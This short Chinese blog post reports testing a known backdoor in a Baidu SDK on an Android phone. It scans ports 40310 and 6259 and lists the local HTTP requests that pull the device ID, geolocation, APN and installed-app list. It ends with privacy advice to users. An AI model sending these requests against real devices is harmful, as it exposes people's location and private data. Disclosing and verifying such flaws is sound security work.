烏雲地址:http://drops.wooyun.org/papers/10061
后門端口:40310/6259
本次測試在Ubuntu下,具體adb調試工具參考 sink_cup的博客 http://www.cnblogs.com/sink_cup/archive/2011/10/31/ubuntu_x64_android_sdk_java.html
lsusb 查看usb設備
下載SDK實在太慢了 放棄,上端口掃描
安裝 zenmap
掃描端口
估計上面幾個端口是華為系統的自帶端口(希望不要有坑)
安裝手機百度APP 再掃描一遍
沒有發現,APP已經更新掉了,換個螞蟻短租 APP
HTTP 請求下
具體獲取資源的請求鏈接如下:
服務查詢
'http://127.0.0.1:40310/getcuid?secret=0&mcmdf=inapp_',
'http://127.0.0.1:40310/geolocation?mcmdf=inapp_',
'http://127.0.0.1:40310/getapn?mcmdf=inapp_',
'http://127.0.0.1:40310/getapplist?mcmdf=inapp_',
'http://127.0.0.1:6259/getcuid?secret=0&mcmdf=inapp_',
'http://127.0.0.1:6259/geolocation?mcmdf=inapp_',
'http://127.0.0.1:6259/getapn?mcmdf=inapp_',
'http://127.0.0.1:6259/getapplist?mcmdf=inapp_'
搜着搜着突然發現 V2EX兩個月前的一個帖子
本文地址:http://www.cnblogs.com/martin-tan/p/4935507.html
總結:任何手機都不要root,華為安卓系統會再鎖屏后自動清理后台程序,如果沒有允許后台駐守,鎖屏之后端口就關掉了,還有就是不要用任何百度系的產品。